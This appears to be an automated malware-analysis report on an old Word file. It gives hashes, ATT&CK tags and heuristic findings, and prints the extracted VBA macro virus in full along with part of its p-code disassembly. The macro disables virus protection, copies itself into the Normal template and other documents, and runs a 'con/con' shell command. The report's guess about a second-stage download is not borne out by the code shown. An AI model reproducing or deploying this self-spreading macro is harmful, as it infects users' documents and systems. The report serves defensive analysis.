Office (OLE) malware analysis — malicious · 86cfc05069d67cbf

MALICIOUS

Office (OLE)

27.5 KB Created: 2001-05-01 15:07:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 9691454b98e6718b176bfabe30da1a37 SHA-1: 4095afa62280d74936be933cea6c6ce4fabe9de4 SHA-256: 86cfc05069d67cbfbd4093812dcd6cce12491249b6209b713053aa16996ced1e

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is automatically executed via the Document_Open subroutine. This macro uses the Shell() function to execute a command, likely to download and run a second-stage payload. The macro also attempts to modify the NormalTemplate, potentially for persistence or to spread to other documents. The specific command executed is 'con/con', which is highly suspicious.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5751 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5751 bytes
SHA-256: `f670a460e7e1c0d3662ea6ac013c670428c66c40c1ec85211a8676c7997d1057`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Pecas" Attribute VB_Base = "1Normal.Pecas" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'morris Private Sub Document_Open() On Error Resume Next Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) Set nt = NormalTemplate.VBProject.VBComponents.Item(1) Set ad = ActiveDocument.VBProject.VBComponents.Item(1) pos = 3 x = "Private Sub Document_Open()" paso2 = False pasada: cont = nt.CodeModule.CountOfLines coad = ad.CodeModule.CountOfLines If nt.CodeModule.lines(1, 1) <> "'morris" Then nt.CodeModule.DeleteLines 1, cont If nt.Name <> "Pecas" Then nt.Name = "Pecas" End If nt.CodeModule.AddFromString ("'morris") If paso2 = False Then nt.CodeModule.AddFromString ("Private Sub Document_Close()") nt.CodeModule.InsertLines pos, ad.CodeModule.lines(pos, coad) Else nt.CodeModule.AddFromString (x) nt.CodeModule.InsertLines pos, ad.CodeModule.lines(pos, coad) If InStr(1, ActiveDocument.Name, "Document") = False Then Selection.TypeText "Game´s over. morris Win......." ActiveDocument.SaveAs FileName:=ActiveDocument.FullName Else ActiveDocument.Saved = True End If End If End If If paso2 = True Then If Day(Now) = Minute(Now) Then ser$ = Shell("con/con", vbNormalFocus) End If Exit Sub Else paso2 = True Set ad = NormalTemplate.VBProject.VBComponents.Item(1) Set nt = ActiveDocument.VBProject.VBComponents.Item(1) GoTo pasada End If End Sub 'Made in Mexico by morris , te Amo Pecas IDyahoo m0rr1z ' Processing file: /opt/analyzer/scan_staging/8e7b09edfd534086b9f65df1add0eca8.bin ' =============================================================================== ' Module streams: ' Macros/VBA/Pecas - 3310 bytes ' Line #0: ' QuoteRem 0x0000 0x0006 "morris" ' Line #1: ' FuncDefn (Private Sub Document_Open()) ' Line #2: ' OnError (Resume Next) ' Line #3: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Sub ' Paren ' Ld Options ' MemSt ConfirmConversions ' BoS 0x0000 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Sub ' Paren ' Ld Options ' MemSt VirusProtection ' BoS 0x0000 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Sub ' Paren ' Ld Options ' MemSt SaveNormalPrompt ' Line #4: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set nt ' Line #5: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' Set ad ' Line #6: ' LitDI2 0x0003 ' St pos ' Line #7: ' LitStr 0x001B "Private Sub Document_Open()" ' St x ' Line #8: ' LitVarSpecial (False) ' St paso2 ' Line #9: ' Label pasada ' Line #10: ' Ld nt ' MemLd CodeModule ' MemLd CountOfLines ' St cont ' Line #11: ' Ld ad ' MemLd CodeModule ' MemLd CountOfLines ' St coad ' Line #12: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld nt ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' LitStr 0x0007 "'morris" ' Ne ' IfBlock ' Line #13: ' LitDI2 0x0001 ' Ld cont ' Ld nt ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0002 ' Line #14: ' Ld nt ' MemLd New ' LitStr 0x0005 "Pecas" ' Ne ' IfBlock ' Line #15: ' LitStr 0x0005 "Pecas" ' Ld nt ' MemSt New ' Line #16: ' EndIfBlock ' Line #17: ' LitStr 0x0007 "'morris" ' Paren ' Ld nt ' MemLd CodeModule ' ArgsMemCall AddFromString 0x0001 ' Line #18: ' Ld paso2 ' LitVarSpecial (False) ' Eq ' IfBlock ' Line #19: ' LitStr 0x001C "Private Sub Document_Close()" ' Paren ' Ld nt ' MemLd CodeModule ' ArgsMemCall AddFromString 0x0001 ' Line #20: ' Ld pos ' Ld pos ' Ld coad ' Ld ad ' MemLd CodeModule ' ArgsMemLd lines 0x0002 ' Ld nt ' MemLd CodeModule ' ArgsMemCall InsertLines 0x0002 ' Line #21: ' ElseBlock ' Line #22: ' Ld x ' Paren ' Ld nt ' MemLd CodeModule ' ArgsMemCall AddFromString 0x0001 ' Line #23: ' Ld pos ' Ld pos ' ... (truncated)

SHA-256: f670a460e7e1c0d3662ea6ac013c670428c66c40c1ec85211a8676c7997d1057

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Pecas"
Attribute VB_Base = "1Normal.Pecas"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'morris
Private Sub Document_Open()
On Error Resume Next
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
pos = 3
x = "Private Sub Document_Open()"
paso2 = False
pasada:
cont = nt.CodeModule.CountOfLines
coad = ad.CodeModule.CountOfLines
If nt.CodeModule.lines(1, 1) <> "'morris" Then
nt.CodeModule.DeleteLines 1, cont
 If nt.Name <> "Pecas" Then
   nt.Name = "Pecas"
 End If
nt.CodeModule.AddFromString ("'morris")
 If paso2 = False Then
  nt.CodeModule.AddFromString ("Private Sub Document_Close()")
  nt.CodeModule.InsertLines pos, ad.CodeModule.lines(pos, coad)
 Else
  nt.CodeModule.AddFromString (x)
  nt.CodeModule.InsertLines pos, ad.CodeModule.lines(pos, coad)
   If InStr(1, ActiveDocument.Name, "Document") = False Then
    Selection.TypeText "Game´s over. morris Win......."
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
   Else
    ActiveDocument.Saved = True
   End If
 End If
End If
If paso2 = True Then
  If Day(Now) = Minute(Now) Then
   ser$ = Shell("con/con", vbNormalFocus)
  End If
Exit Sub
Else
 paso2 = True
 Set ad = NormalTemplate.VBProject.VBComponents.Item(1)
 Set nt = ActiveDocument.VBProject.VBComponents.Item(1)
 GoTo pasada
End If
End Sub
'Made in Mexico by morris , te Amo Pecas IDyahoo m0rr1z









' Processing file: /opt/analyzer/scan_staging/8e7b09edfd534086b9f65df1add0eca8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Pecas - 3310 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0006 "morris"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set nt 
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ad 
' Line #6:
' 	LitDI2 0x0003 
' 	St pos 
' Line #7:
' 	LitStr 0x001B "Private Sub Document_Open()"
' 	St x 
' Line #8:
' 	LitVarSpecial (False)
' 	St paso2 
' Line #9:
' 	Label pasada 
' Line #10:
' 	Ld nt 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St cont 
' Line #11:
' 	Ld ad 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St coad 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x0007 "'morris"
' 	Ne 
' 	IfBlock 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld cont 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #14:
' 	Ld nt 
' 	MemLd New 
' 	LitStr 0x0005 "Pecas"
' 	Ne 
' 	IfBlock 
' Line #15:
' 	LitStr 0x0005 "Pecas"
' 	Ld nt 
' 	MemSt New 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	LitStr 0x0007 "'morris"
' 	Paren 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #18:
' 	Ld paso2 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	Paren 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #20:
' 	Ld pos 
' 	Ld pos 
' 	Ld coad 
' 	Ld ad 
' 	MemLd CodeModule 
' 	ArgsMemLd lines 0x0002 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #21:
' 	ElseBlock 
' Line #22:
' 	Ld x 
' 	Paren 
' 	Ld nt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #23:
' 	Ld pos 
' 	Ld pos 
' 	
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.